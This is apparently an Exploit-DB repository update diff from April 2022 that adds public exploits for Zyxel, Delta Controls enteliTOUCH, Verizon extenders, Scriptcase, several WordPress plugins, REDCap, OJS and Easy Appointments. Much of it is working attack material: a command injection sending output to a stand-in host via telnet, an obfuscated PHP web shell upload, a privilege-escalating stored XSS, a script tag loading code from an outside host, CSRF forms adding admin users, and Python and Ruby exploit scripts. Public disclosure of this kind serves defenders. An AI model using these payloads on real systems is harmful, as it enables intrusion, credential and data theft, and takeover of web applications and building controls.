DB: 2022-04-20

21 changes to exploits/shellcodes

Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path
Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path
7-zip - Code Execution / Local Privilege Escalation
PTPublisher v2.3.4 - Unquoted Service Path
EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
Zyxel NWA-1100-NH - Command Injection
ManageEngine ADSelfService Plus 6.1 - User Enumeration
Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure

Scriptcase 9.7 - Remote Code Execution (RCE)
WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection
Easy Appointments 1.4.2 - Information Disclosure
WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)
REDCap 11.3.9 - Stored Cross Site Scripting
PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)

exploits/hardware/remote/50870.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Zyxel NWA-1100-NH - Command Injection
+# Date: 12/4/2022
+# Exploit Author: Ahmed Alroky
+# Vendor Homepage: https://www.zyxel.com/homepage.shtml
+# Version: ALL BEFORE 2.12
+# Tested on: Linux
+# CVE : CVE-2021-4039
+# References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf ,
+https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml
+
+
+HTTP Request :
+
+POST /login/login.html HTTP/1.1
+Host: IP_address:8081
+Content-Length: 80
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http:/IP_address:8081
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://IP_address:8081/login/login.html
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login

exploits/hardware/remote/50875.txt

@@ -0,0 +1,67 @@
+Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm
+Exploit Author: LiquidWorm
+
+
+Vendor: Verizon Communications Inc.
+Product web page: https://www.verizon.com
+Affected version: GA4.38 - V0.4.038.2131
+
+Summary: An LTE Network Extender enhances your indoor and 4G
+LTE data and voice coverage to provide better service for your
+4G LTE mobile devices. It's an extension of our 4G LTE network
+that's placed directly in your home or office. The LTE Network
+Extender works with all Verizon-sold 4G LTE mobile devices for
+4G LTE data service and HD Voice-capable 4G LTE devices for voice
+service. This easy-to-install device operates like a miniature
+cell tower that plugs into your existing high-speed broadband
+connection to communicate with the Verizon wireless network.
+
+Desc: Verizon's 4G LTE Network Extender is utilising a weak
+default admin password generation algorithm. The password is
+generated using the last 4 values from device's MAC address
+which is disclosed on the main webUI login page to an unauthenticated
+attacker. The values are then concatenated with the string
+'LTEFemto' resulting in something like 'LTEFemtoD080' as the
+default Admin password.
+
+Tested on: lighttpd-web
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5701
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php
+
+
+17.02.2022
+
+--
+
+
+snippet:///Exploit
+//
+// Verizon 4G LTE Network Extender Super Awesome JS Exploit
+//
+
+console.log("Calling 'isDefaultPassword' API");
+let req = new Request("/webapi/isDefaultPassword");
+let def = req.url;
+
+const doAjax = async () => {
+  const resp = await fetch(def);
+  if (resp.ok) {
+    const jsonyo = await resp.json();
+    return Promise.resolve(jsonyo);
+  } else {
+    return Promise.reject("Smth not rite captain!");
+  }
+}
+doAjax().then(console.log).catch(console.log);
+
+await new Promise(t => setTimeout(t, 1337));
+
+console.log("Verizon Admin Password: ");
+let mac = document.querySelector("#mac_address").innerHTML;
+console.log("LTEFemto" + mac.substr(-4));

exploits/hardware/remote/50878.html

@@ -0,0 +1,78 @@
+# Exploit Tile: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
+# Exploit Author: LiquidWorm
+
+<!DOCTYPE html>
+<html>
+<head><title>enteliTouch CSRF</title></head>
+<body>
+<!--
+
+Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)
+
+
+Vendor: Delta Controls Inc.
+Product web page: https://www.deltacontrols.com
+Affected version: 3.40.3935
+                  3.40.3706
+                  3.33.4005
+
+Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
+access to the heart of your BAS. The enteliTOUCH has a 7-inch,
+high-resolution display that serves as an interface to your building.
+Use it as your primary interface for smaller facilities or as an
+on-the-spot access point for larger systems. The intuitive,
+easy-to-navigate interface gives instant access to manage your BAS.
+
+Desc: The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests. This can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site.
+
+Tested on: DELTA enteliTOUCH
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5702
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php
+
+
+06.04.2022
+
+-->
+
+
+CSRF Add User:
+
+<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST">
+  <input type="hidden" name="actionName" value="" />
+  <input type="hidden" name="Username" value="zsl" />
+  <input type="hidden" name="Password" value="123t00t" />
+  <input type="hidden" name="AutoLogout" value="17" />
+  <input type="hidden" name="SS&#95;SelectedOptionId" value="FIL28" />
+  <input type="hidden" name="ObjRef" value="" />
+  <input type="hidden" name="Apply" value="true" />
+  <input type="hidden" name="formAction" value="Add" />
+  <input type="submit" value="Go for UserAdd" />
+</form>
+
+<br />
+
+CSRF Change Admin Password (default: delta:login):
+
+<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">
+  <input type="hidden" name="actionName" value="" />
+  <input type="hidden" name="Username" value="DELTA" />
+  <input type="hidden" name="Password" value="123456" />
+  <input type="hidden" name="AutoLogout" value="30" />
+  <input type="hidden" name="SS&#95;SelectedOptionId" value="" />
+  <input type="hidden" name="ObjRef" value="ZSL-251" />
+  <input type="hidden" name="Apply" value="true" />
+  <input type="hidden" name="formAction" value="Edit" />
+  <input type="submit" value="Go for UserEdit" />
+</form>
+
+</body>
+</html>

exploits/hardware/remote/50879.html

@@ -0,0 +1,56 @@
+# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
+# Exploit Author: LiquidWorm
+
+<!DOCTYPE html>
+<html>
+<head><title>enteliTouch XSS</title></head>
+<body>
+<!--
+
+Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)
+
+
+Vendor: Delta Controls Inc.
+Product web page: https://www.deltacontrols.com
+Affected version: 3.40.3935
+                  3.40.3706
+                  3.33.4005
+
+Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
+access to the heart of your BAS. The enteliTOUCH has a 7-inch,
+high-resolution display that serves as an interface to your building.
+Use it as your primary interface for smaller facilities or as an
+on-the-spot access point for larger systems. The intuitive,
+easy-to-navigate interface gives instant access to manage your BAS.
+
+Desc: Input passed to the POST parameter 'Username' is not properly
+sanitised before being returned to the user. This can be exploited
+to execute arbitrary HTML code in a user's browser session in context
+of an affected site.
+
+Tested on: DELTA enteliTOUCH
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5703
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php
+
+
+06.04.2022
+
+-->
+
+
+<form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">
+  <input type="hidden" name="userInfo" value="" />
+  <input type="hidden" name="UL&#95;SelectedOptionId" value="" />
+  <input type="hidden" name="Username" value=""><&#47;script><script>alert&#40;document&#46;cookie&#41;<&#47;script>" />
+  <input type="hidden" name="formAction" value="Delete" />
+  <input type="submit" value="CSRF XSS Alert!" />
+</form>
+
+</body>
+</html>

exploits/hardware/remote/50880.txt

@@ -0,0 +1,48 @@
+Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure
+Exploit Author: LiquidWorm
+
+
+Vendor: Delta Controls Inc.
+Product web page: https://www.deltacontrols.com
+Affected version: 3.40.3935
+                  3.40.3706
+                  3.33.4005
+
+Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
+access to the heart of your BAS. The enteliTOUCH has a 7-inch,
+high-resolution display that serves as an interface to your building.
+Use it as your primary interface for smaller facilities or as an
+on-the-spot access point for larger systems. The intuitive,
+easy-to-navigate interface gives instant access to manage your BAS.
+
+Desc: The application suffers from a cleartext transmission/storage
+of sensitive information in a Cookie. This allows a remote
+attacker to intercept the HTTP Cookie authentication credentials
+through a man-in-the-middle attack.
+
+Tested on: DELTA enteliTOUCH
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5704
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php
+
+
+06.04.2022
+
+--
+
+
+GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1
+Host: 192.168.0.210
+Cache-Control: max-age=0
+User-Agent: Toucher/1.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG
+Connection: close

exploits/multiple/webapps/50512.py

@@ -2,7 +2,6 @@
 # Date: 11/11/2021
 # Exploit Author: Valentin Lobstein
 # Vendor Homepage: https://apache.org/
-# Software Link: https://github.com/Balgogan/CVE-2021-41773
 # Version: Apache 2.4.49/2.4.50 (CGI enabled)
 # Tested on: Debian GNU/Linux
 # CVE : CVE-2021-41773 / CVE-2021-42013

exploits/php/webapps/50869.txt

@@ -0,0 +1,35 @@
+# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection
+# Date: 2022-04-11
+# Exploit Author: Mohsen Dehghani (aka 0xProfessional)
+# Vendor Homepage: https://motopress.com/
+# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
+# Version: 4.2.4
+# Tested on: Windows/XAMPP
+###########################################################################
+PoC:
+
+Vulnerable File:sync-urls-repository.php
+
+    public function insertUrls($roomId, $urls)
+    {
+        global $wpdb;
+
+        if (empty($urls)) {
+            return;
+        }
+
+        $urls = $this->prepareUrls($urls);
+        $values = array();
+
+        foreach ($urls as $syncId => $url) {
+            $values[] = $wpdb->prepare("(%d, %s, %s)", $roomId, $syncId, $url);
+        }
+
+        $sql = "INSERT INTO {$this->tableName} (room_id, sync_id, calendar_url)"
+            . " VALUES " . implode(', ', $values);
+
+        $wpdb->query($sql);
+
+Vulnerable Parameter:
+room_id=SQL Injection
+sync_id=SQL Injection

exploits/php/webapps/50871.rb

@@ -0,0 +1,81 @@
+# Exploit Title: Easy Appointments 1.4.2 - Information Disclosure
+# Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
+# Author website: https://pwn.by/noraj/
+# Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482
+# Date: 2022-04-11
+# Vendor Homepage: https://easyappointments.org/
+# Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz
+# Version: < 1.4.3 (it means up to 1.4.2)
+# Tested on: Easy!Appointments Version 1.3.2
+
+# Vulnerability
+## Discoverer: Francesco CARLUCCI
+## Date: 2022-01-30
+## Discoverer website: https://carluc.ci/
+## Discovered on OpenNetAdmin 1.4.2
+## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments
+## CVE: CVE-2022-0482
+## CWE: CWE-863
+## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c
+## References:
+##   - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/
+##   - https://github.com/alextselegidis/easyappointments/tree/1.4.2
+##   - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml
+##   - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/
+##   - https://nvd.nist.gov/vuln/detail/CVE-2022-0482
+
+#!/usr/bin/env ruby
+
+require 'date'
+require 'httpx'
+require 'docopt'
+
+doc = <<~DOCOPT
+Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure
+
+  Source: https://github.com/Acceis/exploit-CVE-2022-0482
+
+  Usage:
+    #{__FILE__} <url> [<startDate> <endDate>] [--debug]
+    #{__FILE__} -h | --help
+
+  Options:
+    <url>       Root URL (base path) including HTTP scheme, port and root folder
+    <startDate> All events since (default: 2015-01-11)
+    <endDate>   All events until (default: today)
+    --debug     Display arguments
+    -h, --help  Show this screen
+
+  Examples:
+    #{__FILE__} http://10.0.0.1
+    #{__FILE__} https://10.0.0.1:4567/subdir 2022-04-01 2022-04-30
+DOCOPT
+
+def fetch_csrf(root_url, http)
+  vuln_url = "#{root_url}/index.php"
+
+  http.get(vuln_url)
+end
+
+def exploit(root_url, startDate, endDate, http)
+  vuln_url = "#{root_url}/index.php/backend_api/ajax_get_calendar_events"
+
+  params = {
+    'csrfToken' => http.cookies.first.value, # csrfCookie
+    'startDate' => startDate.nil? ? '2015-01-11' : startDate,
+    'endDate' => endDate.nil? ? Date.today.to_s : endDate
+  }
+
+  http.post(vuln_url, form: params)
+end
+
+begin
+  args = Docopt.docopt(doc)
+  pp args if args['--debug']
+
+  http = HTTPX.plugin(:cookies)
+  fetch_csrf(args['<url>'], http)
+  puts exploit(args['<url>'], args['<startDate>'], args['<endDate>'], http).body
+rescue Docopt::Exit => e
+  puts e.message
+end

exploits/php/webapps/50872.txt

@@ -0,0 +1,47 @@
+# Exploit Title: Scriptcasr 9.7 arbitrary file upload getshell
+# Date: 2022-04-08
+# Exploit Author: luckyt0mat0
+# Vendor Homepage:  https://www.scriptcase.net/
+# Software Link: https://www.scriptcase.net/download/
+# Version: 9.7
+# Tested on: Windows Server 2019
+
+# Proof of Concept:
+
+POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1
+Host: 10.50.1.214:8091
+Content-Length: 570
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ
+Origin: http://10.50.1.214:8091
+Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us
+Connection: close
+
+------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
+Content-Disposition: form-data; name="jqul_csrf_token"
+
+gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M
+------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
+Content-Disposition: form-data; name="files[]"; filename="123.php"
+Content-Type: text/html
+
+<?php
+error_reporting(0);
+$a = rad2deg^(3).(2);
+$b = asin^(2).(6);
+$c = ceil^(1).(1);
+$exp = $a.$b.$c; //assert
+$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET
+$pi=$$pi; //$_GET
+call_user_func($exp,$pi{0}($pi{1}));
+?>
+------WebKitFormBoundary6gbgDzCQ2aZWm6iZ———
+
+# Notes:
+- PHPSESSID is  - be1281e8cde9348d284c3074c9bea53e
+- Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php

exploits/php/webapps/50874.txt

@@ -0,0 +1,27 @@
+# Exploit Title: WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
+# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
+# Date: 2022-04-13
+# Exploit Author: UnD3sc0n0c1d0
+# Vendor Homepage: http://www.a-j-evolution.com/
+# Software Link: https://downloads.wordpress.org/plugin/video-synchro-pdf.1.7.4.zip
+# Category: Web Application
+# Version: 1.7.4
+# Tested on: CentOS / WordPress 5.9.3
+# CVE : N/A
+
+# 1. Technical Description:
+The plugin does not properly sanitize the nom, pdf, mp4, webm and ogg parameters, allowing
+potentially dangerous characters to be inserted. This includes the reported payload, which
+triggers a persistent Cross-Site Scripting (XSS).
+
+# 2. Proof of Concept (PoC):
+ a. Install and activate version 1.7.4 of the plugin.
+ b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=aje_videosyncropdf_videos).
+ c. Open the "Video example" or create a new one (whichever you prefer).
+ d. Change or add in some of the displayed fields (Name, PDF file, MP4 video, WebM video or OGG video)
+	the following payload:
+		" autofocus onfocus=alert(/XSS/)>.
+ e. Save the changes. "Edit" button.
+ f. JavaScript will be executed and a popup with the text "XSS" will be displayed.
+
+Note: This change will be permanent until you modify the edited field.

exploits/php/webapps/50876.txt

@@ -0,0 +1,23 @@
+# Exploit Title: WordPress Plugin Popup Maker <1.16.5 - Persistent Cross-Site Scripting (Authenticated)
+# Date: 2022-03-03
+# Exploit Author: Roel van Beurden
+# Vendor Homepage: https://wppopupmaker.com
+# Software Link: https://downloads.wordpress.org/plugin/popup-maker.1.16.4.zip
+# Version: <1.16.5
+# Tested on: WordPress 5.9 on Ubuntu 20.04
+
+
+1. Description:
+----------------------
+WordPress Plugin Popup Maker <1.16.5 does not sanitise and escape some of its popup settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
+
+
+2. Proof of Concept:
+----------------------
+Create Popup > Popup Settings > Triggers > Add New Cookie > Add > Cookie Time  (overwrite the default '1 month' with XSS payload)
+Click 'Add' what triggers the XSS payload
+
+Payload examples:
+
+<script>alert('XSS');</script>
+<img src=x onerror=alert('XSS')>

exploits/php/webapps/50877.txt

@@ -0,0 +1,44 @@
+# Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting
+# Date: 2021-10-11
+# Exploit Author: Kendrick Lam
+# References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js
+# Vendor Homepage: https://projectredcap.org
+# Software Link: https://projectredcap.org
+# Version: Redcap before 11.4.0
+# Tested on: 11.2.5
+# CVE: CVE-2021-42136
+# Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf
+
+### Stored XSS – Missing Data Code Value (found by Kendrick Lam)
+
+It was possible to store JavaScript as values for Missing Data Codes.
+
+- Where: Missing Data Code.
+- Payload:
+		<script>
+		var target = document.location.host;
+		var csrf_token = csrf_token;
+		var userId = '<userId>'; // Replace with your user ID.
+
+		function privesc()
+		{
+			var xhr = new XMLHttpRequest();
+			xhr.open("POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true);
+			xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+			xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
+			xhr.withCredentials = "true";
+			var body = "";
+			body += "userid=" + userId + "&attrs=admin_rights%2Csuper_user%2Caccount_manager%2Caccess_system_config%2Caccess_system_upgrade%2Caccess_external_module_install%2Caccess_admin_dashboards&csrf_token=" + csrf_token;
+			xhr.send(body);
+			return true;
+		}
+
+		privesc();
+		</script>
+- Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator).
+- Privileges: Low privileged / regular user
+- Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
+
+- Privileges:
+  + Store: Low privileged user is able to store Missing Data Code values.
+  + Execute: Any authenticated user. The payload will trigger once the page loads, this means storing the payload and sending over the link to an administrator would be able to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX

exploits/php/webapps/50881.txt

@@ -0,0 +1,18 @@
+# Exploit Title: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
+# Date: 31/01/2022
+# Exploit Author: Hemant Kashyap
+# Vendor Homepage: https://github.com/pkp/pkp-lib/issues/7649
+# Version: PKP Open Journals System 2.4.8 >= 3.3
+# Tested on: All OS
+# CVE : CVE-2022-24181
+# References: https://youtu.be/v8-9evO2oVg
+
+XSS via Host Header injection and Steal Password Reset Token of another user Step to reproduce:
+
+  1)  Go to this site: https://who's-using-ojs-software.com
+  2)  And capture this request in burp , and send to repeater.
+  3)  Add this after Host Header X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com
+  4) And this click on send , after this right click on request and click on show response in browser , after this copy the request.
+  5) Paste this request in browser , and you'll see xss pop-up. Mitigation: Update to newer version.
+
+ This vulnerability in PKP vendor software Open-journal-system version 2.4.8 to 3.3.8 all are vulnerable to xss via Host Header injection and steal password reset token vulnerability

exploits/php/webapps/50882.py

@@ -0,0 +1,118 @@
+# Exploit Title: WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
+# Date: 04/16/2022
+# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
+# Vendor Homepage: https://elementor.com/
+# Software Link: https://wordpress.org/plugins/elementor/advanced/ (scroll down to select the version)
+# Version: 3.6.0, 3.6.1, 3.62
+# Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload)
+
+#!/usr/bin/python
+import requests
+import re
+
+# WARNING: This exploit does NOT include the payload.
+# Also, be sure you already have some valid credentials. This exploit needs an account in order to work.
+
+# # # # # VULNERABILITY DESCRIPTION # # # # #
+# The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file.
+# This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control)
+# The file that contains this vulnerability is elementor/core/app/modules/onboarding/module.php
+#
+# At the end of this file you can find this code:
+#	add_action( 'admin_init', function() {
+#			if ( wp_doing_ajax() &&
+#				isset( $_POST['action'] ) &&
+#				isset( $_POST['_nonce'] ) &&
+#				wp_verify_nonce( $_POST['_nonce'], Ajax::NONCE_KEY )
+#			) {
+#				$this->maybe_handle_ajax();
+#			}
+#		} );
+#
+# This code is triggered whenever ANY user account visits /wp-admin
+# In order to work we need the following 4 things:
+# 1. The call must be an "ajax call" (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call /wp-admin/admin-ajax.php
+# 2. The parameter "action" must be "elementor_upload_and_install_pro" (check out the function named maybe_handle_ajax() in the same file)
+# 3. The parameter "_nonce" must be retrieved after login by inspecting the /wp-admin page (this exploit does this in DoLogin function)
+# 4. The parameter "fileToUpload" must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file)
+#
+# The file we upload must have the following structure:
+# 1. It must be a ZIP file. You can name it as you want.
+# 2. It must contain a folder called "elementor-pro"
+# 3. This folder must contain a file named "elementor-pro.php"
+# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
+#
+# WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload.
+# If it tries, for example, to connect to an offline host, it could lead to a Denial of Service.
+# In order to prevent this, I suggest you to use some variable to activate the payload.
+# Something like this (visit anypage.php?activate=1 in order to continue with the actual payload):
+# if (!isset($_GET['activate']))
+#	return;
+
+# Change the following 4 variables:
+payloadFileName = 'elementor-pro.zip' # Change this with the path of the ZIP archive that contains your payload
+baseUrl = 'http://192.168.56.103/wordpress/' # Change this with the base url of the target
+username = 'guest' # Change this with the username you want to use to log in
+password = 'test' # Change this with the password you want to use to log in
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
+
+session = requests.Session()
+cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' } # WordPress needs this to tell if browser can manage cookies
+
+def DoLogin(username, password):
+	global cookies
+	loginUrl = baseUrl + 'wp-login.php'
+	adminUrl = baseUrl + 'wp-admin/'
+	data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 }
+
+	# search for: "ajax":{"url":"http:\/\/baseUrl\/wp-admin\/admin-ajax.php","nonce":"4e8878bdba"}
+	# 4e8878bdba is just an example of nonce. It can be anything else.
+	regexp = re.compile('"ajax":\\{"url":".+admin\\-ajax\\.php","nonce":"(.+)"\\}')
+	response = session.post(loginUrl, cookies=cookies, data=data)
+
+	search = regexp.search(response.text)
+
+	if not search:
+		# I've tested this on WordPress v. 5.9.3
+		# Fix the regexp if needed.
+		print('Error - Invalid credentials?')
+		#print(response.text)
+	else:
+		return search.group(1)
+
+def UploadFile(fileName, nonce):
+	uploadUrl = baseUrl + 'wp-admin/admin-ajax.php'
+	data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce }
+	files = { 'fileToUpload' : open(fileName, 'rb') }
+	regexp = re.compile('"elementorProInstalled":true') # search for: "elementorProInstalled":true
+	response = session.post(uploadUrl, data=data, files=files)
+
+	search = regexp.search(response.text)
+
+	if not search:
+		# If Elemento Pro is already installed, the upload will fail.
+		# You can print the response to investigate further
+		print ('Error - Upload failed')
+		# print (response.text)
+		return False
+	else:
+		print ('Upload completed successfully!')
+		return True
+
+# Define YOUR method to activate your payload (if needed)
+def ActivatePayload():
+	payloadUrl = baseUrl + 'index.php?activate=1'
+	session.get(payloadUrl)
+
+
+print('Trying to login...')
+nonce = DoLogin(username, password)
+print('Nonce found: ' + nonce)
+
+print('Uploading payload...')
+fileUploaded = UploadFile(payloadFileName, nonce)
+
+# Define YOUR method to activate your payload (if needed)
+if fileUploaded:
+	print ('Activating payload...')
+	ActivatePayload()

exploits/php/webapps/50884.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)# Google Dork: NA
+# Date: 11/03/2022
+# Exploit Author: Ali J
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.5.0
+# Version: 1.5.0
+# Tested on: Windows 10
+
+Steps to Reproduce:
+1. Login with user 1 and navigate to localhost/FUEL-CMS/fuel/sitevariables
+2. Select any variable, click on delete button and select "yes, delete it". Intercept this request and generate a CSRF POC for this. After that drop the request.
+3. Login with user 2 in a seperate browser and execute the CSRF POC.
+4. Observe that the site variable has been deleted. To confirm, login with user 1 again and observe that the variable has been deleted from site variables.

exploits/windows/local/50867.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Microsoft Exchange Mailbox Assistants  15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Exploit Date: 2022-04-11
+# Vendor : Microsoft
+# Version : 15.0.847.40
+# Tested on OS: Microsoft Exchange Server 2013 SP1
+
+#PoC :
+==============
+
+C:\>sc qc MSExchangeMailboxAssistants
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+
+NOME_SERVIZIO: MSExchangeMailboxAssistants
+        TIPO                      : 10  WIN32_OWN_PROCESS
+        TIPO_AVVIO                : 2   AUTO_START
+        CONTROLLO_ERRORE          : 1   NORMAL
+        NOME_PERCORSO_BINARIO     : C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxAssistants.exe
+        GRUPPO_ORDINE_CARICAMENTO :
+        TAG                       : 0
